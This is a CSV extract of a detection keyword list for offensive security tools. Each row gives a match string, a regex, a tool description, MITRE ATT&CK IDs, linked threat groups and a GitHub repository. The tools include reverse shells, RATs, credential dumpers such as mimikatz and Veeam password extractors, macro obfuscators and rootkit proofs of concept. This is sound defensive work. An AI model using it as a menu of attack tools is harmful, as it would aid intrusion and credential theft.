"*UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN*",".{0,1000}UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62109"
"*'UwBvAGM'; $xd = 'AawBlA'*",".{0,1000}\'UwBvAGM\'\;\s\$xd\s\=\s\'AawBlA\'.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","62114"
"*v1k1ngfr.github.io/fuegoshell/*",".{0,1000}v1k1ngfr\.github\.io\/fuegoshell\/.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","62115"
"*v1k1ngfr/fuegoshell*",".{0,1000}v1k1ngfr\/fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","62116"
"*V1V1/DecryptTeamViewer*",".{0,1000}V1V1\/DecryptTeamViewer.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","62117"
"*V3n0M-Scanner*",".{0,1000}V3n0M\-Scanner.{0,1000}","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Vulnerability Scanner","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","N/A","10","1503","413","2023-11-14T23:05:16Z","2013-10-21T06:05:17Z","62118"
"*v4d1/Dome*",".{0,1000}v4d1\/Dome.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","62119"
"*valid_user@contoso.com:Password1*",".{0,1000}valid_user\@contoso\.com\:Password1.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","62121"
"*vanhauser-thc/thc-hydra*",".{0,1000}vanhauser\-thc\/thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","62122"
"*vault::cred*",".{0,1000}vault\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62123"
"*vaultSchema.Add(new Guid(""""4BF4C442-9B8A-41A0-B380-DD4A704DDB28""""*",".{0,1000}vaultSchema\.Add\(new\sGuid\(\""4BF4C442\-9B8A\-41A0\-B380\-DD4A704DDB28\"".{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#content","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","62125"
"*VBA Obfuscation Tools combined with an MS office document generator*",".{0,1000}VBA\sObfuscation\sTools\scombined\swith\san\sMS\soffice\sdocument\sgenerator.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","62126"
"*Vbad/VBad.py*",".{0,1000}Vbad\/VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","62127"
"*vba-macro-mac-persistence.vbs*",".{0,1000}vba\-macro\-mac\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","62128"
"*VBA-RunPE -*",".{0,1000}VBA\-RunPE\s\-.{0,1000}","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","N/A","9","804","179","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z","62129"
"*vba-windows-persistence.vbs*",".{0,1000}vba\-windows\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","62130"
"*vbLib.ExecuteCMDAsync*",".{0,1000}vbLib\.ExecuteCMDAsync.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62131"
"*vbLib.Meterpreter*",".{0,1000}vbLib\.Meterpreter.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62132"
"*vbLib.UACBypassExecuteCMDAsync*",".{0,1000}vbLib\.UACBypassExecuteCMDAsync.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62133"
"*vbLib.WmiExec*",".{0,1000}vbLib\.WmiExec.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62134"
"*vbLib.WscriptExec*",".{0,1000}vbLib\.WscriptExec.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62135"
"*vbs_obfuscator.vbs*",".{0,1000}vbs_obfuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62143"
"*vbs_ofuscator.vbs*",".{0,1000}vbs_ofuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62144"
"*vbs-obfuscator.py*",".{0,1000}vbs\-obfuscator\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","62146"
"*VBS-UEFI-Locks-Bypass/Config.xml*",".{0,1000}VBS\-UEFI\-Locks\-Bypass\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62147"
"*VbulletinWidgetTemplateRce.py*",".{0,1000}VbulletinWidgetTemplateRce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","62148"
"*vcenter_forge_saml_token*",".{0,1000}vcenter_forge_saml_token.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62149"
"*vcenter_secrets_dump.*",".{0,1000}vcenter_secrets_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62150"
"*vcenter_secrets_dump.rb*",".{0,1000}vcenter_secrets_dump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62151"
"*vcsmap*",".{0,1000}vcsmap.{0,1000}","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","N/A","2","139","23","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z","62152"
"*vdi2john.pl*",".{0,1000}vdi2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62153"
"*VectorKernel\BlockNewProc*",".{0,1000}VectorKernel\\BlockNewProc.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62154"
"*VectorKernel\CreateToken*",".{0,1000}VectorKernel\\CreateToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62155"
"*VectorKernel\ModHide*",".{0,1000}VectorKernel\\ModHide.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62156"
"*VectorKernel\StealToken*",".{0,1000}VectorKernel\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62157"
"*VectorKernel-main.zip*",".{0,1000}VectorKernel\-main\.zip.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62158"
"*vectra-ai-research/MAAD-AF*",".{0,1000}vectra\-ai\-research\/MAAD\-AF.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","62159"
"*veeam_credential_dump.*",".{0,1000}veeam_credential_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62160"
"*veeam_dump*",".{0,1000}veeam_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62161"
"*veeam_dump_mssql.ps1*",".{0,1000}veeam_dump_mssql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","62162"
"*veeam_dump_postgresql.ps1*",".{0,1000}veeam_dump_postgresql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","62163"
"*veeam-creds-main*",".{0,1000}veeam\-creds\-main.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62164"
"*Veeam-Get-Creds.ps1*",".{0,1000}Veeam\-Get\-Creds\.ps1.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62165"
"*VeeamGetCreds.yaml*",".{0,1000}VeeamGetCreds\.yaml.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62166"
"*VeeamHax_TemporaryKey.pfx*",".{0,1000}VeeamHax_TemporaryKey\.pfx.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","1","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","62167"
"*veeampot.py*",".{0,1000}veeampot\.py.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62168"
"*Vegile -*",".{0,1000}Vegile\s\-.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","0","N/A","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","62169"
"*Venom Admin Node Start*",".{0,1000}Venom\sAdmin\sNode\sStart.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","62170"
"*Venom\agent\agent.go*",".{0,1000}Venom\\agent\\agent\.go.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","62171"
"*venv wapiti3*",".{0,1000}venv\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62172"
